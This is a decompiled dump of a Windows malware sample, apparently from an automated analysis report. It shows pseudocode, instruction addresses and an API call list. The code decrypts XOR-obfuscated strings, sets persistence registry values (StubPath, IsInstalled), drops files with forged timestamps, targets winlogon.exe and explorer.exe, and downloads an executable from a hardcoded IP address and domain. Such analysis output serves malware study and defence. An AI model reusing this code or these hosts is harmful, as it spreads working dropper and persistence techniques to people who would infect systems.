																						ExitWindowsEx(6, 0);
																					} else {
																						RtlAdjustPrivilege(0x13, 1, 0,  &(_t625[0xe]));
																						 *0x412240(1);
																					}
																				} else {
																					RegSetValueExA(_t625[0x16], "g00d d0gg", 0, 4, _t554, 4);
																				}
																			}
																			RegCloseKey(_t625[0x11]);
																		}
																		continue;
																	}
																	_t368 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t625[0x1c]), 0);
																	__eflags = _t368;
																	if(_t368 != 0) {
																		__eflags =  *_t625;
																		if( *_t625 == 0) {
																			goto L175;
																		}
																		L173:
																		_t625[0xc] = 0;
																		goto L175;
																	}
																	_t624 =  &(_t625[0x19]);
																	GetSystemTimeAsFileTime(_t624);
																	_t625[0x18] = 8;
																	_t605 =  &(_t625[0x17]);
																	_t370 = RegQueryValueExA(_t625[0x20], "ConnPred", 0,  &(_t625[0x17]), _t605,  &(_t625[0x18]));
																	__eflags = _t370;
																	if(_t370 != 0) {
																		L144:
																		__eflags = E004014D8(_t624, 0x412070) - 0x4af;
																		if(__eflags <= 0) {
																			L155:
																			__eflags =  *0x412080;
																			if( *0x412080 == 0) {
																				L158:
																				_t625[0x18] = 8;
																				__eflags = RegQueryValueExA(_t625[0x20], "UseExtProfile", 0,  &(_t625[0x17]), _t605,  &(_t625[0x18]));
																				if(__eflags != 0) {
																					L160:
																					_t375 = E00402427(__eflags);
																					__eflags = _t375;
																					if(_t375 != 0) {
																						L170:
																						RegCloseKey(_t625[0x1b]);
																						goto L171;
																					}
																					_push(1);
																					_push(0);
																					_t378 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																					__eflags = _t378;
																					if(_t378 == 0) {
																						L163:
																						_t625[0x18] = 8;
																						_t552 =  &(_t625[0x13]);
																						_t380 = RegQueryValueExA(_t625[0x20], "UseDflProfile", 0,  &(_t625[0x17]),  &(_t625[0x13]),  &(_t625[0x18]));
																						__eflags = _t380;
																						if(_t380 != 0) {
																							_t389 = _t625[0x16] + 0x1162f100;
																							__eflags = _t389;
																							asm("adc edx, 0xffffff9b");
																							_t625[0x12] = _t389;
																							_t625[0x13] = _t625[0x17];
																						}
																						__eflags = E004014D8( &(_t625[0x19]), _t552) - 0x152ab;
																						if(__eflags <= 0) {
																							goto L170;
																						} else {
																							_t383 = E00402427(__eflags);
																							__eflags = _t383;
																							if(_t383 != 0) {
																								goto L170;
																							}
																							_push(3);
																							_push(0);
																							_t385 = E0040211B("tombul.gif", 0);
																							__eflags = _t385;
																							if(_t385 == 0) {
																								goto L170;
																							}
																							_push(8);
																							_push(_t624);
																							_push(0xb);
																							_push(0);
																							_push("UseDflProfile");
																							L169:
																							RegSetValueExA(_t625[0x20], ??, ??, ??, ??, ??);
																							RegCloseKey(_t625[0x1b]);
																							 *_t625 = 1;
																							goto L173;
																						}
																					}
																					_t625[0x16] = _t625[0x19].dwLowDateTime;
																					_t625[0x17] = _t625[0x1a];
																					_push(8);
																					_push(_t624);
																					_push(0xb);
																					_push(0);
																					_push("UseExtProfile");
																					goto L169;
																				}
																				__eflags = E004014D8( &(_t625[0x19]),  &(_t625[0x16])) - 0x152ab;
																				if(__eflags <= 0) {
																					goto L163;
																				}
																				goto L160;
																			}
																			_push(3);
																			_push(0);
																			_t394 = E0040211B("grazie.gif", 0);
																			__eflags = _t394;
																			if(_t394 == 0) {
																				goto L158;
																			}
																			_t625[0x16] = _t625[0x19].dwLowDateTime;
																			_t625[0x17] = _t625[0x1a];
																			_push(8);
																			_push(_t624);
																			_push(0xb);
																			_push(0);
																			_push("ConnPred");
																			goto L169;
																		}
																		_t396 = E00402427(__eflags);
																		__eflags = _t396;
																		if(_t396 != 0) {
																			goto L170;
																		}
																		_t398 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																		_t611 = 0;
																		__eflags = _t398;
																		_t553 = _t398;
																		if(_t398 != 0) {
																			_t403 = E00401E00(_t398,  &(_t625[0x15]), 2);
																			__eflags = _t403 - 2;
																			if(_t403 == 2) {
																				_t611 = 1;
																			}
																		}
																		E00401F59(_t553);
																		__eflags = _t611;
																		if(_t611 == 0) {
																			 *0x412080 = 0;
																		} else {
																			 *0x412070 = _t625[0x19];
																			_t402 = 0;
																			__eflags = _t625[0x14] - 0x49;
																			 *0x412074 = _t625[0x1a];
																			if(_t625[0x14] == 0x49) {
																				__eflags = _t625[0x14] - 0x54;
																				if(_t625[0x14] == 0x54) {
																					_t402 = 1;
																				}
																			}
																			 *0x412080 = _t402;
																		}
																		goto L155;
																	}
																	_t405 = E004014D8(_t624, _t605);
																	__eflags = _t405 - 0x152ab;
																	if(_t405 <= 0x152ab) {
																		goto L158;
																	}
																	goto L144;
																	L174:
																	_t204 =  &(_t625[0xc]);
																	 *_t204 =  &(_t625[0xc]->nLength);
																	__eflags =  *_t204;
																	goto L175;
																}
															}
															_t406 = 0x4071e0;
															while(1) {
																__eflags = _t406 - 0x407214;
																if(_t406 >= 0x407214) {
																	break;
																}
																 *_t406 =  *_t406 ^ 0x000000d4;
																_t406 =  &(_t406[1]);
															}
															_t407 = 0x4071c3;
															while(1) {
																__eflags = _t407 - 0x4071cf;
																if(_t407 >= 0x4071cf) {
																	break;
																}
																 *_t407 =  *_t407 ^ 0x000000d4;
																_t407 =  &(_t407[1]);
															}
															_t613 =  &(_t625[0x26]);
															_t408 = RegCreateKeyA(0x80000002, 0x4071e0, _t613);
															__eflags = _t408;
															if(_t408 == 0) {
																RegSetValueExA(_t625[0x2b], 0x4071c3, 0, 4,  &(_t625[0x28]), 4);
																RegCloseKey(_t625[0x26]);
															}
															_t409 = 0x4071a0;
															while(1) {
																__eflags = _t409 - 0x4071c2;
																if(_t409 >= 0x4071c2) {
																	break;
																}
																 *_t409 =  *_t409 ^ 0x000000d4;
																_t409 =  &(_t409[1]);
															}
															_t410 = 0x407177;
															while(1) {
																__eflags = _t410 - 0x407188;
																if(_t410 >= 0x407188) {
																	break;
																}
																 *_t410 =  *_t410 ^ 0x000000d4;
																_t410 =  &(_t410[1]);
															}
															_t411 = 0x407160;
															while(1) {
																__eflags = _t411 - 0x407176;
																if(_t411 >= 0x407176) {
																	break;
																}
																 *_t411 =  *_t411 ^ 0x000000d4;
																_t411 =  &(_t411[1]);
															}
															_t412 = 0x40714a;
															while(1) {
																__eflags = _t412 - 0x40715f;
																if(_t412 >= 0x40715f) {
																	break;
																}
																 *_t412 =  *_t412 ^ 0x000000d4;
																_t412 =  &(_t412[1]);
															}
															_t413 = 0x407135;
															while(1) {
																__eflags = _t413 - 0x407149;
																if(_t413 >= 0x407149) {
																	break;
																}
																 *_t413 =  *_t413 ^ 0x000000d4;
																_t413 =  &(_t413[1]);
															}
															_t414 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t613);
															__eflags = _t414;
															if(_t414 == 0) {
																_t557 =  &(_t625[0x28]);
																RegSetValueExA(_t625[0x2b], 0x407177, 0, 4, _t557, 4);
																RegSetValueExA(_t625[0x2b], 0x407160, 0, 4, _t557, 4);
																RegSetValueExA(_t625[0x2b], 0x40714a, 0, 4, _t557, 4);
																RegSetValueExA(_t625[0x2b], 0x407135, 0, 4, _t557, 4);
																RegCloseKey(_t625[0x26]);
															}
															_t415 = 0x4070c0;
															while(1) {
																__eflags = _t415 - 0x407134;
																if(_t415 >= 0x407134) {
																	break;
																}
																 *_t415 =  *_t415 ^ 0x000000d4;
																_t415 =  &(_t415[1]);
															}
															_t416 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t613);
															__eflags = _t416;
															if(_t416 != 0) {
																goto L135;
															}
															_t418 = E00401000(0x8000);
															_t625[0x1d] = 0x4000;
															_t614 = _t418;
															_t419 = 0x407080;
															_t625[0x27] = 0x4000;
															while(1) {
																__eflags = _t419 - 0x4070a4;
																if(_t419 >= 0x4070a4) {
																	break;
																}
																 *_t419 =  *_t419 ^ 0x000000d4;
																_t419 =  &(_t419[1]);
															}
															_t625[0xd] = 0;
															while(1) {
																_t151 =  &(_t614[0x4000]); // 0x4000
																_t555 = _t151;
																_t423 = RegEnumValueA(_t625[0x2d], _t625[0x13], _t614,  &(_t625[0x2b]), 0,  &(_t625[0x1e]), _t151,  &(_t625[0x1d]));
																__eflags = _t423;
																if(_t423 != 0) {
																	break;
																}
																__eflags = _t625[0x1c] - 1;
																if(_t625[0x1c] == 1) {
																	_t425 = E00401311(_t555, 0x40708d);
																	__eflags = _t425;
																	if(_t425 != 0) {
																		RegDeleteValueA(_t625[0x27], _t614);
																	}
																}
																_t146 =  &(_t625[0xd]);
																 *_t146 =  &(_t625[0xd]->nLength);
																__eflags =  *_t146;
																_t625[0x1d] = 0x4000;
																_t625[0x27] = 0x4000;
															}
															_t556 =  &(_t625[0x55a]);
															_t428 = wsprintfA(_t614, 0x407080, _t556) + 1;
															__eflags = _t428;
															_t625 =  &(_t625[3]);
															RegSetValueExA(_t625[0x2b], _t556, 0, 1, _t614, _t428);
															E00401029(_t614);
															RegCloseKey(_t625[0x26]);
															goto L135;
														}
														_t446 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t625[0x26]));
														__eflags = _t446;
														if(_t446 != 0) {
															goto L95;
														}
														goto L92;
													}
													__eflags = _t291 - 0xffffffff;
													if(_t291 == 0xffffffff) {
														goto L84;
													}
													L83:
													WriteFile(_t575, 0x408840, 0x5e00,  &(_t625[0x28]), 0);
													CloseHandle(_t625[0x28]);
													goto L85;
												}
												__eflags = _t288 - 0xffffffff;
												if(_t288 != 0xffffffff) {
													goto L83;
												}
												goto L81;
											}
											__eflags = _t454 + 1;
											if(_t454 + 1 != 0) {
												L64:
												WriteFile(_t625[0x2c], 0x40e640, 0x1400,  &(_t625[0x28]), 0);
												__eflags = _t625[3];
												if(_t625[3] != 0) {
													SetFileTime(_t625[0x2b],  &(_t625[0x21]),  &(_t625[0x22]),  &(_t625[0x23]));
												}
												CloseHandle(_t625[0x28]);
												_t625[9] = 1;
												_push(0);
												_push("winlogon.exe");
												_t559 =  &(_t625[0x388]);
												_t460 = E0040318D(_t559);
												_t625 =  &(_t625[3]);
												__eflags = _t460;
												if(_t460 == 0) {
													_push(0);
													_push("explorer.exe");
													E0040318D(_t559);
													_t625 =  &(_t625[3]);
												}
												_push(0);
												_push("kernel32.dll");
												_push(_t559);
												L78:
												E0040318D();
												_t625 =  &(_t625[3]);
												CreateFileA( &(_t625[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
												goto L79;
											}
											goto L76;
										}
										__eflags = _t280 + 1;
										if(_t280 + 1 != 0) {
											goto L64;
										}
										goto L73;
									}
									L70:
									_t625[9] = 1;
									_push(0);
									_push("kernel32.dll");
									_push( &(_t625[0x388]));
									goto L78;
								}
								__eflags = _t276 + 1;
								if(_t276 + 1 == 0) {
									goto L69;
								}
								goto L64;
							}
							L33:
							CloseHandle(_t625[0x28]);
						}
						goto L29;
					}
				}
				__eflags = _t258 - 0xffffffff;
				if(_t258 != 0xffffffff) {
					WriteFile(_t258, 0x4072a0, 0x800,  &(_t625[0x28]), 0);
					_t506 = E004010B2();
					_t625[6] = _t506;
					__eflags = _t506;
					if(_t506 == 0) {
						_t625[6] = 0xc6;
					}
					_t508 = E00401000(_t623 + 0x64);
					 *((char*)(_t508 + _t623)) = 0;
					_t607 = _t508;
					_t620 = _t508;
					_t603 = _t625[5];
					_t509 = _t508 + _t623;
					while(1) {
						__eflags = _t620 - _t509;
						if(_t620 >= _t509) {
							break;
						}
						_t534 = _t625[6] & 0x000000ff ^  *_t603;
						_t603 =  &(_t603[0]);
						 *_t620 = _t534;
						_t620 = _t620 + 1;
						_t509 = _t607 + _t623;
					}
					_t510 =  &(_t625[0x55a]);
					_t562 = _t607 + _t623;
					_push(_t510);
					L00405E40();
					_t621 = _t562 +  &(_t510[1]);
					__eflags = _t621 - _t562 + 0x64;
					while(__eflags < 0) {
						 *_t621 = E004010B2();
						_t621 = _t621 + 1;
						_t20 = _t623 + 0x64; // 0x64
						__eflags = _t621 - _t607 + _t20;
					}
					 *(_t607 + _t623 + 1) = _t623;
					_t564 = _t607 + _t623;
					_push( &(_t625[0x55a]));
					_t622 = _t564;
					_push( &(_t564[1]));
					L00405E20();
					_t513 =  &(_t564[0x19]);
					while(1) {
						__eflags = _t622 - _t513;
						if(_t622 >= _t513) {
							break;
						}
						 *_t622 =  *_t622 ^ _t625[6] & 0x000000ff;
						_t622 =  &(_t622[0]);
						_t29 = _t623 + 0x64; // 0x64
						_t513 = _t607 + _t29;
					}
					WriteFile(_t625[0x2c], _t607, _t623 + 0x64,  &(_t625[0x28]), 0);
					E00401029(_t607);
					__eflags = _t625[3];
					if(_t625[3] != 0) {
						SetFileTime(_t625[0x2b],  &(_t625[0x21]),  &(_t625[0x22]),  &(_t625[0x23]));
					}
					CloseHandle(_t625[0x28]);
					_t565 =  &(_t625[0x3d0]);
					CreateFileA(_t565, 0x80000000, 1, 0, 3, 0, 0);
					E00401251(_t625[0x26]);
					_t625[0x27] = 1;
					_t523 = RegSetValueExA(_t625[0x2b], "IsInstalled", 0, 4,  &(_t625[0x28]), 4);
					_push(_t565);
					L00405E40();
					_t524 = _t523 + 1;
					__eflags = _t524;
					RegSetValueExA(_t625[0x2b], "StubPath", 0, 1, _t565, _t524);
					_t625[0xa] = 1;
				}
				L1:
				if(_t255 >= 0x407286) {
					_t256 = CreateMutexA(0, 0, "h`r@");
					_t625[0x28] = _t256;
					__eflags = _t256;
					if(_t256 == 0) {
						Sleep(0x7d0);
					} else {
						WaitForSingleObject(_t256, 0x2710);
						CloseHandle(_t625[0x28]);
					}
					goto L6;
				} else {
					 *_t255 =  *_t255 ^ 0x000000d4;
					_t255 =  &(_t255[1]);
					goto L1;
				}
			}

0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x0040495c
0x004049aa
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00404e62
0x00000000
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404ba8
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404ba2
0x004049e3
0x004049e6
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00404b67
0x00404961
0x00404966
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x00000000
0x00404968
0x00404968
0x0040496b
0x00000000
0x0040496b

APIs

GetSystemDirectoryA.KERNEL32 ref: 00404940
lstrcat.KERNEL32(?,0041103E), ref: 00404951
lstrcat.KERNEL32(00000000,?), ref: 00404957
CreateMutexA.KERNEL32(00000000,00000000,00407260,00000000,?,0041103E,?,00000104), ref: 00404977
WaitForSingleObject.KERNEL32(00000000,00002710,00000000,00000000,00407260,00000000,?,0041103E,?,00000104), ref: 0040498D
CloseHandle.KERNEL32(?,00000000,00002710,00000000,00000000,00407260,00000000,?,0041103E,?,00000104), ref: 00404999
Sleep.KERNEL32(000007D0,00000000,00000000,00407260,00000000,?,0041103E,?,00000104), ref: 004049A5
SetFileAttributesA.KERNEL32(?,00000080,000007D0,00000000,00000000,00407260,00000000,?,0041103E,?,00000104), ref: 004049B7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,00407260,00000000,?,0041103E), ref: 004049CF
WriteFile.KERNEL32(00000000,004072A0,00000800,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000), ref: 00404A01
lstrlen.KERNEL32(?,00000000,004072A0,00000800,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0), ref: 00404A4F
lstrcpy.KERNEL32(?,?), ref: 00404A84
WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,004072A0,00000800,?,00000000,?,40000000,00000000), ref: 00404AB4
SetFileTime.KERNEL32(?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000000,004072A0,00000800,?), ref: 00404AE6
CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,00000000,004072A0,00000800,?,00000000,?,40000000), ref: 00404AF2
RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,?,00000004,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000), ref: 00404B44
lstrlen.KERNEL32(?,?,IsInstalled,00000000,00000004,?,00000004,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00404B4A
RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001,?,?,IsInstalled,00000000,00000004,?,00000004,?,80000000,00000001), ref: 00404B62
RegCloseKey.ADVAPI32(?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,00407260,00000000,?), ref: 00404B76
RegDeleteKeyA.ADVAPI32(80000001,?), ref: 00404B88

